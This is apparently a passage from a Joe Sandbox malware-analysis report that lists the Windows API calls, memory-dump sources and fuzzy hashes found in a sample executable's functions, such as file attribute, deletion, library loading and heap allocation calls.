                                                                                          • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00879EF9,?,?,?,00879D92,?,00000001,00000000,?,?), ref: 0087A0D7
                                                                                          • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00879EF9,?,?,?,00879D92,?,00000001,00000000,?,?), ref: 0087A108
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributesFile
                                                                                          • String ID:
                                                                                          • API String ID: 3188754299-0
                                                                                          • Opcode ID: 1634c49ba1d15f88d462897d956079be3ed0a4391068b04ccb1e68d025c2b0a0
                                                                                          • Instruction ID: dd552b58baee30f565169180a2821ef1408d7f4d9acd56baf805d211e13c1522
                                                                                          • Opcode Fuzzy Hash: 1634c49ba1d15f88d462897d956079be3ed0a4391068b04ccb1e68d025c2b0a0
                                                                                          • Instruction Fuzzy Hash: F5F0A031280109ABEF116F64EC01BDE776DFF04381F44C061B988C6069DB32DA989B61
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ItemText_swprintf
                                                                                          • String ID:
                                                                                          • API String ID: 3011073432-0
                                                                                          • Opcode ID: 7ce322625ce38bb5369d233cc3e58f06e66e0bba348bcb507d11c4ade6493ea9
                                                                                          • Instruction ID: 48762e8a7d88a606bc6500b3d506c5d9787fa900a89a57aa75f6b57b5a29f89b
                                                                                          • Opcode Fuzzy Hash: 7ce322625ce38bb5369d233cc3e58f06e66e0bba348bcb507d11c4ade6493ea9
                                                                                          • Instruction Fuzzy Hash: D3F0EC3255474CB7E711BBA4DC06F993B5DFB04381F044096F605D20A6E6715A209773
                                                                                          APIs
                                                                                          • DeleteFileW.KERNELBASE(?,?,?,00879611,?,?,0087946C), ref: 00879DBD
                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00879611,?,?,0087946C), ref: 00879DEB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: DeleteFile
                                                                                          • String ID:
                                                                                          • API String ID: 4033686569-0
                                                                                          • Opcode ID: 748850104a32eb51a393f0ef767d296be6fc0112538c1eb557576d811f62ee0e
                                                                                          • Instruction ID: 8e2c5ab403cf85bee6c4cd45f7836a458a4728ebab96232377ae25741b82aa22
                                                                                          • Opcode Fuzzy Hash: 748850104a32eb51a393f0ef767d296be6fc0112538c1eb557576d811f62ee0e
                                                                                          • Instruction Fuzzy Hash: 3BE0923165120DABEB20AFA5DC41BEA779EFF09381F848061FA88C2054DB31DD949AA0
                                                                                          APIs
                                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,00879E08,?,008775A0,?,?,?,?), ref: 00879E24
                                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00879E08,?,008775A0,?,?,?,?), ref: 00879E50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributesFile
                                                                                          • String ID:
                                                                                          • API String ID: 3188754299-0
                                                                                          • Opcode ID: 178dbb5a7c5c8998e0e4c25a0aee2225d57e8c8cc2650b0d68dcb515ac2f83e4
                                                                                          • Instruction ID: de42d794e139a3d8c51ee4b2f4b6b40c59bb0f273ca9d467df0b4dcd39cc2b80
                                                                                          • Opcode Fuzzy Hash: 178dbb5a7c5c8998e0e4c25a0aee2225d57e8c8cc2650b0d68dcb515ac2f83e4
                                                                                          • Instruction Fuzzy Hash: 10E06D325002686BDB10EA68DC05BDA7759FB097A2F0482A1FE88E3294D6709D888BD0
                                                                                          APIs
                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0087F324
                                                                                          • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0087DEC8,Crypt32.dll,?,0087DF4A,?,0087DF2E,?,?,?,?), ref: 0087F346
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: DirectoryLibraryLoadSystem
                                                                                          • String ID:
                                                                                          • API String ID: 1175261203-0
                                                                                          • Opcode ID: f6d35b0a50a59b11ec73ecc9f7ab88a55a53f350c867a84af66f7d795f66c71f
                                                                                          • Instruction ID: 833477c3e5e8b5ee7a520ae725ed22714b40117b4d4c849c443406850a520f15
                                                                                          • Opcode Fuzzy Hash: f6d35b0a50a59b11ec73ecc9f7ab88a55a53f350c867a84af66f7d795f66c71f
                                                                                          • Instruction Fuzzy Hash: 7EE012728111186BDB11AAA4DC05FEB776CFB093C1F0440A5B948D3105DA74D940CBB1
                                                                                          APIs
                                                                                          • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00888945
                                                                                          • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0088894C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: BitmapCreateFromGdipStream
                                                                                          • String ID:
                                                                                          • API String ID: 1918208029-0
                                                                                          • Opcode ID: 95f3e3472ce487bca1444d1d36a3ddba2ec190df2fd0ee4ef00cb9049e497dee
                                                                                          • Instruction ID: f084f5dc7c2e0a19995424621a3ad358d789cd66ebe6d3c33d4e7e7970c61461
                                                                                          • Opcode Fuzzy Hash: 95f3e3472ce487bca1444d1d36a3ddba2ec190df2fd0ee4ef00cb9049e497dee
                                                                                          • Instruction Fuzzy Hash: 2AE06D75800208EFCB50FF88C8017A9BBE8FB08321F10806AE845D3700E770AE049BA2
                                                                                          APIs
                                                                                          • GdiplusShutdown.GDIPLUS(?,?,?,0089F79B,000000FF), ref: 008890C7
                                                                                          • CoUninitialize.COMBASE(?,?,?,0089F79B,000000FF), ref: 008890CC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: GdiplusShutdownUninitialize
                                                                                          • String ID:
                                                                                          • API String ID: 3856339756-0
                                                                                          • Opcode ID: 36f0f0833907d68061e641382d37be47e56e1250f3ac239e134d8606e82fb664
                                                                                          • Instruction ID: 59f0c17c472baec98d0d09b12e7d0dbfee3101d8321cf501c694a0785588fb10
                                                                                          • Opcode Fuzzy Hash: 36f0f0833907d68061e641382d37be47e56e1250f3ac239e134d8606e82fb664
                                                                                          • Instruction Fuzzy Hash: 56E01A32548A44AFC714EB8CDD45B45BBE9FB09B20F008769B92AC3B60CB396840CB91
                                                                                          APIs
                                                                                            • Part of subcall function 00891D9A: try_get_function.LIBVCRUNTIME ref: 00891DAF
                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00890CC4
                                                                                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00890CCF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                          • String ID:
                                                                                          • API String ID: 806969131-0
                                                                                          • Opcode ID: b667425466d4e30dcf95b971a108ee069aa27d55a67d80b262318bef4a035207
                                                                                          • Instruction ID: 82876f2f51a93f7ea9911c9957f775db6693332f546093e7e6d46b8804cc2cb9
                                                                                          • Opcode Fuzzy Hash: b667425466d4e30dcf95b971a108ee069aa27d55a67d80b262318bef4a035207
                                                                                          • Instruction Fuzzy Hash: 89D0A72554C30A2C2E143378281246A2344F742BBC7680346E032D5AC1EB1481419913
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ItemShowWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3351165006-0
                                                                                          • Opcode ID: b47e00942b9ebb1024b65f5144f7fd068793714165360800a6b241846da30f0a
                                                                                          • Instruction ID: 97bac4796dc53a0df8d1463fcb050f0cb685d408516c445a1ced5bc8c764489c
                                                                                          • Opcode Fuzzy Hash: b47e00942b9ebb1024b65f5144f7fd068793714165360800a6b241846da30f0a
                                                                                          • Instruction Fuzzy Hash: E2C01232058100BFDB010B70DC09C2EBBA9AB96621F00C904B4A5C0460C338C010DB22
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(008B1E74,?,?,?,?,0087A5A0,?,?,?,?,0089F79B,000000FF), ref: 0087FC42
                                                                                          • LeaveCriticalSection.KERNEL32(008B1E74,?,?,?,?,0087A5A0,?,?,?,?,0089F79B,000000FF), ref: 0087FC99
                                                                                            • Part of subcall function 0087F9D1: ReleaseSemaphore.KERNEL32(?,00000020,00000000), ref: 0087FA05
                                                                                            • Part of subcall function 0087F9D1: CloseHandle.KERNEL32(?,?), ref: 0087FA1F
                                                                                            • Part of subcall function 0087F9D1: DeleteCriticalSection.KERNEL32(?), ref: 0087FA38
                                                                                            • Part of subcall function 0087F9D1: CloseHandle.KERNELBASE(?), ref: 0087FA44
                                                                                            • Part of subcall function 0087F9D1: CloseHandle.KERNEL32(?), ref: 0087FA50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCriticalHandleSection$DeleteEnterLeaveReleaseSemaphore
                                                                                          • String ID:
                                                                                          • API String ID: 3265325312-0
                                                                                          • Opcode ID: 8c99e87c0ec6a3786d497367be2956edae8cfbd5e1aa3ffcf4493f0a974982bb
                                                                                          • Instruction ID: a6aa2d9856861d978fc3a195d121dd53dcb737d9bff8d1df31555cd89c09c8ac
                                                                                          • Opcode Fuzzy Hash: 8c99e87c0ec6a3786d497367be2956edae8cfbd5e1aa3ffcf4493f0a974982bb
                                                                                          • Instruction Fuzzy Hash: 83F0CD331041245BDA126726EC8457E771CF7C57643558226FF08EB14BDB35EC0187A1
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog
                                                                                          • String ID:
                                                                                          • API String ID: 3519838083-0
                                                                                          • Opcode ID: be54a47f8c07f2e2aaeda6ca349b778536c77095e4b45013148c843fff0efa07
                                                                                          • Instruction ID: 9352174c1c08aaf3186afa23581280bbf347d7bd44973f867ea3e8269f64482d
                                                                                          • Opcode Fuzzy Hash: be54a47f8c07f2e2aaeda6ca349b778536c77095e4b45013148c843fff0efa07
                                                                                          • Instruction Fuzzy Hash: 24B1D070A00646AEEF29CF7CC489AB9FBA6FF05304F14825AD469D3685C731D964CB91
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 00878210
                                                                                            • Part of subcall function 0087137E: __EH_prolog.LIBCMT ref: 00871383
                                                                                            • Part of subcall function 0087137E: new.LIBCMT ref: 008713FB
                                                                                            • Part of subcall function 008719B1: __EH_prolog.LIBCMT ref: 008719B6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog
                                                                                          • String ID:
                                                                                          • API String ID: 3519838083-0
                                                                                          • Opcode ID: 039427ed5ad34e2913c23f0ad8b0c4be5fb7aab7e9ab685ef48bcb7fce5c7138
                                                                                          • Instruction ID: 74c12e3bc2fcdbd650a118eab85dc7f98667defcf7f57cee9faf4e480f8ba849
                                                                                          • Opcode Fuzzy Hash: 039427ed5ad34e2913c23f0ad8b0c4be5fb7aab7e9ab685ef48bcb7fce5c7138
                                                                                          • Instruction Fuzzy Hash: 7041D3319406589ADF20EB68CC59BEA7369FF50300F0480EAE58EE3157DE749EC8DB21
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog
                                                                                          • String ID:
                                                                                          • API String ID: 3519838083-0
                                                                                          • Opcode ID: e2ebd36664e4b39b9d154f48c35a15a25e1121b8a78a8c995afa00f44b8595cb
                                                                                          • Instruction ID: d7c18f3a41fecc5fe60daec1b2a038000c10a3582f395fd7fbbe6d6030670e5d
                                                                                          • Opcode Fuzzy Hash: e2ebd36664e4b39b9d154f48c35a15a25e1121b8a78a8c995afa00f44b8595cb
                                                                                          • Instruction Fuzzy Hash: 0021F6B1E40615AFDB14FFB8CC41A6BB7A8FB14314F00423AE505EB682E7709D00C7A9
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 0088948A
                                                                                            • Part of subcall function 0087137E: __EH_prolog.LIBCMT ref: 00871383
                                                                                            • Part of subcall function 0087137E: new.LIBCMT ref: 008713FB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog
                                                                                          • String ID:
                                                                                          • API String ID: 3519838083-0
                                                                                          • Opcode ID: fd61407eaf39f08c46a78eb45ada961bc0c7b4fb59c9a85fef2e9fe9bab45cd9
                                                                                          • Instruction ID: cdc12fb76d856685cffae1d437deaf34236309ca9e8b727b9213c5e39ce45c46
                                                                                          • Opcode Fuzzy Hash: fd61407eaf39f08c46a78eb45ada961bc0c7b4fb59c9a85fef2e9fe9bab45cd9
                                                                                          • Instruction Fuzzy Hash: E1217C76C04249AACF15EF98D9419FEB7B4FF19304F1444AAE809F7602D735AE05CB61
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog
                                                                                          • String ID:
                                                                                          • API String ID: 3519838083-0
                                                                                          • Opcode ID: 8683f9b0fa33d89e09de2cbbb2c32bd9785543a64fdd72a3c885996f630b283b
                                                                                          • Instruction ID: db7268eae18d7fea02b33ff47e63e51e85736cdee68082e4efee8f6c30556d60
                                                                                          • Opcode Fuzzy Hash: 8683f9b0fa33d89e09de2cbbb2c32bd9785543a64fdd72a3c885996f630b283b
                                                                                          • Instruction Fuzzy Hash: 67117073A40429ABCF12AAACDC959DEB736FF48740F448529F819E7219DA34CC1087A1
                                                                                          APIs
                                                                                            • Part of subcall function 00895A8D: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0089634D,00000001,00000364,?,00892213,?,?,008ACBE8), ref: 00895ACE
                                                                                          • _free.LIBCMT ref: 00898F50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap_free
                                                                                          • String ID:
                                                                                          • API String ID: 614378929-0
                                                                                          • Opcode ID: ffe7a698f1ec9d313924040038d8a651e71016dbf9af90b8887af046bf84921e
                                                                                          • Instruction ID: 692a11d1a2f58efbffea055b835c0b00bc53ba5f15e6c097d7fb8bae77cc6bcc
                                                                                          • Opcode Fuzzy Hash: ffe7a698f1ec9d313924040038d8a651e71016dbf9af90b8887af046bf84921e
                                                                                          • Instruction Fuzzy Hash: EA012672200345ABEB219F69D88595AFBD9FB86370F29066DE189D3280EE30A805C764
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0089634D,00000001,00000364,?,00892213,?,?,008ACBE8), ref: 00895ACE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: 58f1f6e0f0a9a092c5ab3aeec26df8c8e8882ca52b970966f5928b955f86b9fd
                                                                                          • Instruction ID: 58bb3fd8391a9d107dd44cf672e6683ddc40c34c10c1d4056ff4201e9296316e
                                                                                          • Opcode Fuzzy Hash: 58f1f6e0f0a9a092c5ab3aeec26df8c8e8882ca52b970966f5928b955f86b9fd
                                                                                          • Instruction Fuzzy Hash: 8DF0BE31601E346AEF237B269C85B5A37C8FF417A0F2C4221F819E7994CA30DC0087A9
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,008923AA,?,0000015D,?,?,?,?,00892F29,000000FF,00000000,?,?), ref: 00895A2E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
